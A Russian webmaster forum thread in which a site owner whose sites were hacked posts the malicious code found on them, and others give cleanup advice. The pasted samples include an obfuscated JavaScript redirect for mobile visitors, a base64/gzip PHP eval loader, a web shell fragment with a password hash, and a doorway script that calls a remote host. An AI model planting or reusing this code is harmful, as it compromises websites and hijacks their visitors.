- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Переиграть и победить: как анализировать конкурентов для продвижения сайта
С помощью Ahrefs
Александр Шестаков
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Скопируйте код .htaccess пожалуйста, который вставляют, буду очень признателен. Можно в ПМ
/ru/forum/774117
Скопируйте код .htaccess пожалуйста, который вставляют, буду очень признателен. Можно в ПМ
/ru/forum/774117
Я его потер, но так как часто меня взламывают, я думаю скоро пришлю:)
---------- Добавлено 11.03.2013 в 22:41 ----------
Еще нашел подозрительны файл counter.html с содержимым:
l=~[];l={___:++l,$$$$:(![]+"")[l],__$:++l,$_$_:(![]+"")[l],_$_:++l,$_$$:({}+"")[l],$$_$:(l[l]+"")[l],_$$:++l,$$$_:(!""+"")[l],$__:++l,$_$:++l,$$__:({}+"")[l],$$_:++l,$$$:++l,$___:++l,$__$:++l};l.$_=(l.$_=l+"")[l.$_$]+(l._$=l.$_[l.__$])+(l.$$=(l.$+"")[l.__$])+((!l)+"")[l._$$]+(l.__=l.$_[l.$$_])+(l.$=(!""+"")[l.__$])+(l._=(!""+"")[l._$_])+l.$_[l.$_$]+l.__+l._$+l.$;l.$$=l.$+(!""+"")[l._$$]+l.__+l._+l.$+l.$$;l.$=(l.___)[l.$_][l.$_];l.$(l.$(l.$$+"\""+"\\"+l.__$+l.$_$+l.__$+l.$$$$+"(\\"+l.__$+l.$_$+l.$$_+l.$_$_+"\\"+l.__$+l.$$_+l.$$_+"\\"+l.__$+l.$_$+l.__$+"\\"+l.__$+l.$__+l.$$$+l.$_$_+l.__+l._$+"\\"+l.__$+l.$$_+l._$_+"."+l._+"\\"+l.__$+l.$$_+l._$$+l.$$$_+"\\"+l.__$+l.$$_+l._$_+"\\"+l.__$+l.___+l.__$+"\\"+l.__$+l.$__+l.$$$+l.$$$_+"\\"+l.__$+l.$_$+l.$$_+l.__+".\\"+l.__$+l.$_$+l.$_$+l.$_$_+l.__+l.$$__+"\\"+l.__$+l.$_$+l.___+"(/("+l.$_$_+"\\"+l.__$+l.$_$+l.$$_+l.$$_$+"\\"+l.__$+l.$$_+l._$_+l._$+"\\"+l.__$+l.$_$+l.__$+l.$$_$+"|\\"+l.__$+l.$_$+l.$_$+"\\"+l.__$+l.$_$+l.__$+l.$$_$+"\\"+l.__$+l.$$_+l.___+"|\\"+l.__$+l.$_$+l._$_+l._$_+"\\"+l.__$+l.$_$+l.$_$+l.$$$_+"|\\"+l.__$+l.$$_+l._$$+"\\"+l.__$+l.$$$+l.__$+"\\"+l.__$+l.$_$+l.$_$+l.$_$$+"\\"+l.__$+l.$_$+l.__$+l.$_$_+"\\"+l.__$+l.$_$+l.$$_+"|\\"+l.__$+l.$$_+l._$$+l.$$$_+"\\"+l.__$+l.$$_+l._$_+"\\"+l.__$+l.$_$+l.__$+l.$$$_+"\\"+l.__$+l.$$_+l._$$+"\\"+l.$__+l.___+l.$$_+l.___+"|\\"+l.__$+l.$$_+l._$$+"\\"+l.__$+l.$$$+l.__$+"\\"+l.__$+l.$_$+l.$_$+l.$_$$+l._$+"\\"+l.__$+l.$$_+l._$$+"|\\"+l.__$+l.$$_+l.$$$+"\\"+l.__$+l.$_$+l.__$+"\\"+l.__$+l.$_$+l.$$_+l.$$_$+l._$+"\\"+l.__$+l.$$_+l.$$$+"\\"+l.__$+l.$$_+l._$$+"\\"+l.$__+l.___+"\\"+l.__$+l.$_$+l.$_$+l._$+l.$_$$+"\\"+l.__$+l.$_$+l.__$+(![]+"")[l._$_]+l.$$$_+"|\\"+l.__$+l.$$_+l.$$$+"\\"+l.__$+l.$_$+l.__$+"\\"+l.__$+l.$_$+l.$$_+l.$$_$+l._$+"\\"+l.__$+l.$$_+l.$$$+"\\"+l.__$+l.$$_+l._$$+"\\"+l.$__+l.___+l.$$__+l.$$$_+"|\\"+l.__$+l.$$_+l.___+"\\"+l.__$+l.$$_+l.___+l.$$__+"|\\"+l.__$+l.$$_+l._$$+"\\"+l.__$+l.$_$+l.$_$+l.$_$_+"\\"+l.__$+l.$$_+l._$_+l.__+"\\"+l.__$+l.$$_+l.___+"\\"+l.__$+l.$_$+l.___+l._$+"\\"+l.__$+l.$_$+l.$$_+l.$$$_+"|"+l.$_$$+(![]+"")[l._$_]+l.$_$_+l.$$__+"\\"+l.__$+l.$_$+l._$$+l.$_$$+l.$$$_+"\\"+l.__$+l.$$_+l._$_+"\\"+l.__$+l.$$_+l._$_+"\\"+l.__$+l.$$$+l.__$+"|\\"+l.__$+l.$_$+l.$_$+l.__+"\\"+l.__$+l.$_$+l._$$+"|\\"+l.__$+l.$$_+l.$$$+"\\"+l.__$+l.$_$+l.__$+"\\"+l.__$+l.$_$+l.$$_+l.$$_$+l._$+"\\"+l.__$+l.$$_+l.$$$+"\\"+l.__$+l.$$_+l._$$+"\\"+l.$__+l.___+"\\"+l.__$+l.$$_+l.___+"\\"+l.__$+l.$_$+l.___+l._$+"\\"+l.__$+l.$_$+l.$$_+l.$$$_+")/\\"+l.__$+l.$_$+l.__$+")!==\\"+l.__$+l.$_$+l.$$_+l._+(![]+"")[l._$_]+(![]+"")[l._$_]+"){\\"+l.$__+l.___+"\\"+l.$__+l.___+"\\"+l.__$+l._$_+"\\"+l.$__+l.___+"\\"+l.$__+l.___+"\\"+l.__$+l.$_$+l.__$+l.$$$$+"("+l.$$_$+l._$+l.$$__+l._+"\\"+l.__$+l.$_$+l.$_$+l.$$$_+"\\"+l.__$+l.$_$+l.$$_+l.__+".\\"+l.__$+l.$$_+l._$_+l.$$$_+l.$$$$+l.$$$_+"\\"+l.__$+l.$$_+l._$_+"\\"+l.__$+l.$$_+l._$_+l.$$$_+"\\"+l.__$+l.$$_+l._$_+".\\"+l.__$+l.$_$+l.$_$+l.$_$_+l.__+l.$$__+"\\"+l.__$+l.$_$+l.___+"(/(\\"+l.__$+l.$$$+l.__$+l.$_$_+"\\"+l.__$+l.$_$+l.$$_+l.$$_$+l.$$$_+"\\"+l.__$+l.$$$+l.___+"|\\"+l.__$+l.$__+l.$$$+l._$+l._$+"\\"+l.__$+l.$__+l.$$$+(![]+"")[l._$_]+l.$$$_+"|\\"+l.__$+l.$$_+l._$_+l.$_$_+"\\"+l.__$+l.$_$+l.$_$+l.$_$$+(![]+"")[l._$_]+l.$$$_+"\\"+l.__$+l.$$_+l._$_+"|\\"+l.__$+l.$_$+l.$_$+l.$_$_+"\\"+l.__$+l.$_$+l.__$+(![]+"")[l._$_]+")/\\"+l.__$+l.$_$+l.__$+")!==\\"+l.__$+l.$_$+l.$$_+l._+(![]+"")[l._$_]+(![]+"")[l._$_]+"){\\"+l.__$+l._$_+"\\"+l.$__+l.___+"\\"+l.$__+l.___+"\\"+l.$__+l.___+"\\"+l.$__+l.___+"\\"+l.__$+l.$$_+l.$$$+"\\"+l.__$+l.$_$+l.__$+"\\"+l.__$+l.$_$+l.$$_+l.$$_$+l._$+"\\"+l.__$+l.$$_+l.$$$+"."+(![]+"")[l._$_]+l._$+l.$$__+l.$_$_+l.__+"\\"+l.__$+l.$_$+l.__$+l._$+"\\"+l.__$+l.$_$+l.$$_+"\\"+l.$__+l.___+"=\\"+l.$__+l.___+"\\\"\\"+l.__$+l.$_$+l.___+l.__+l.__+"\\"+l.__$+l.$$_+l.___+"://\\"+l.__$+l.$_$+l.$_$+l._$+l.$_$$+"\\"+l.__$+l.$_$+l.__$+(![]+"")[l._$_]+l.$$$_+"-"+(![]+"")[l._$_]+l._$+l.$_$_+l.$$_$+"\\"+l.__$+l.$_$+l.__$+"\\"+l.__$+l.$_$+l.$$_+"\\"+l.__$+l.$__+l.$$$+"."+l.$$__+l._$+"\\"+l.__$+l.$_$+l.$_$+"/\\"+l.__$+l.$_$+l.$_$+l._$+l.$_$$+"\\"+l.__$+l.$_$+l.__$+(![]+"")[l._$_]+"/\\"+l.__$+l.$__+l.$$$+l._$+".\\"+l.__$+l.$$_+l.___+"\\"+l.__$+l.$_$+l.___+"\\"+l.__$+l.$$_+l.___+"?\\"+l.__$+l.$$_+l._$$+"\\"+l.__$+l.$_$+l.__$+l.$$_$+"="+l._$$+"\\\";\\"+l.__$+l._$_+"\\"+l.$__+l.___+"\\"+l.$__+l.___+"}\\"+l.$__+l.___+"\\"+l.$__+l.___+"\\"+l.__$+l._$_+"}"+"\"")())();
</script>
---------- Добавлено 11.03.2013 в 23:11 ----------
И еще вот такое:
<?php
eval ( gzuncompress ( base64_decode ( 'eNqNUVFKw0AQ/VbwDiNItxFNq0bbKtX+KAjeQGTZJBsTTdqSjaIRwSr+iTfwDlUUimi9wu6NnE0CIm1EFnZ3Zt68eTOzEKbQBhbH7BKqYGzNzS6g5xBImFKfCZ/AEcaJ12o2ueMyq9V0rOb6muV5dWvNXq23PNuz3XXyK9Fhjs+pG8R5Nn66LOJVSvf2D3YpNcAEUiN4T9SaQuMFIc95SgqUkumImUGnyUuCqOCtAlmpE1gEsoGPnsHcbOChW5em/CIQiUCrTJgBlQp0tBVpzj+R2xgtQAYsQ5kmA8+VljHDHb+Xk9NjnlCn10149285mf5r4KHgBUnWzDwEQo9sSmoxSF21E52iVQ7JyGd+oi5LWD7FznF61nV6UT/mQuvr2EzwDYu63Om5uuGpXRA/SfqbtdqJMMN0WfD4nMemHaS1nWKP7dLVVtAUScxZ1F5ZtVok018IzDrOC/bP/jO2JZjs6WcL+RomEHmtX6POkUQ+yTc5ls/qHu9XOZIfcgzqTg3UrRzKT3S+yJG6VQ8gv9QNul7kEOqNRgMwOASdgu43+Y74Mf5G6hHUQHMM0Ic2pmFEfpikEJEt/RsxZD9U' ) ) );
?>
И еще вот такое:
А если у меня страницы все статичные? Нет там никакого *.php ?
Так есть PHP? Или нету? Вы прежде чем обвинять хостера со своими файлами разберитесь.. посмотрите grep-ом.. или скриптом готовым
При этом утечку через локальный комп исключать нельзя...
Есть еще код сапы
---------- Добавлено 11.03.2013 в 23:17 ----------
Так есть PHP? Или нету? Вы прежде чем обвинять хостера со своими файлами разберитесь.. посмотрите grep-ом.. или скриптом готовым
У меня нет php, но ручками покопался в папках и нашел такой файлик javascript.php
Есть какие то команды для поиска файлов с расширением php ?
У меня нет php, но ручками покопался в папках и нашел такой файлик javascript.php
Есть какие то команды для поиска файлов с расширением php ?
Спасибо! Проверяю
---------- Добавлено 12.03.2013 в 00:01 ----------
Чем дальше в лес тем глубже болото еще такое:
---------- Добавлено 12.03.2013 в 00:02 ----------
И вот такое:
$auth_pass = "a8c7bfbbf4b3c1696c0fb305e5baab1a";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'5b3Nehu30jC4tq4C6vCkyZiiSMr2cSiRkixLthxbcvRjO7H8MU2ySXbUZDH4zsEp4QASgyI96fHXVgRTg+PjzhA5AzdCcwIyt3xph4+mS3bmNzFdNJUaq6B3RAEf4q15mgx4+h6EZaCbEw5aH42KJgjontpF5Y8MkOX9xCd4DMznufRRUEKXA8v5vBrCRNCi/VlgNmnbv9wOgxssuNKqyUdoUtYREmqRX3H97t4Xu5ioSLIzRUyBv3/AA=='\x29\x29\x29\x3B",".");?>
Нужно смериться с тем, что все сайты и почти каждый их файл заражены кусками js и прочей нечистью.
1) Нужно вылечить свой компьютер и удалить все ФТП клиентами хотя бы на время
2) Слить все файлы и один за другим руками и поиском вычистить лишний код их сайтов.
3) Обновить все CMS и залить все обратно
А если у меня страницы все статичные?
Пофиг. Они же выполняются как ПХП. Или вирус в джипеге. Или еще где-то. Мне на статику вешали вирус только в путь. Лечите, хостер не при делах. Сюда, короче: /ru/forum/774117
По ходу дела у меня на многих сайтах стояли мини движки Dle
$template = "mixsoftware.ru"; //указываем имя шаблона
$key = "40"; //указываем ID темы ключей
$keyCount = 2998; //указываем сколько ключей использовать для дорвея
$dirSite = str_replace("/", ":", trim(dirname($_SERVER["SCRIPT_NAME"]))) . ":";
$host = "http://$server/get.proxy?t=$template&k=$key&c=$keyCount&dir=$dirSite&host=".$_SERVER["HTTP_HOST"]."&url=";
---------- Добавлено 12.03.2013 в 02:47 ----------
Скопируйте код .htaccess пожалуйста, который вставляют, буду очень признателен. Можно в ПМ
/ru/forum/774117
вот нашел то что было в js:
<script type="text/javascript">
<!--
if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){
window.location = "http://qr-update.com/u/4270";
}
//-->
</script>
Ruslan203, тем более, если много сайтов. Понятно, что в статике сложно спрятать вирус. Но они ползают с сайта на сайт в доли секунды.
Будете чистить - только все сайты сразу, иначе никакого результата.